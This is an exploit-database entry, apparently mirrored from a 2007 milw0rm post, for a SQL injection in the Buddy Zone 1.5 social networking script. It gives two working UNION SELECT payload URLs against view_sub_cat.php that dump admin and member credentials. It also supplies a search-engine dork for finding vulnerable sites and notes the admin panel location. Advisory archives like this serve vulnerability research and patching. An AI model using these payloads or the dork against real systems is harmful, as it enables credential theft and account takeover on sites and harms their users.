header-logo
Suggest Exploit
vendor:
Buddy Zone
by:
t0pP8uZz & xprog
N/A
CVSS
N/A
SQL Injection
CWE
Product Name: Buddy Zone
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Buddy Zone Version 1.5 SQL Injection Vulnerability

Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.

Mitigation:

Unknown
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+             Buddy Zone Version 1.5 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.vastal.com/buddy-zone-social-networking-script.html
DORK: allintext:"Powered By Buddy Zone"


DESCRIPTION: 
Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.


EXPLOITS:
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*


Tip/Note:
The Administrator's Panel is in /admin/.

GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps !


--==+================================================================================+==--
--==+             Buddy Zone Version 1.5 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-29]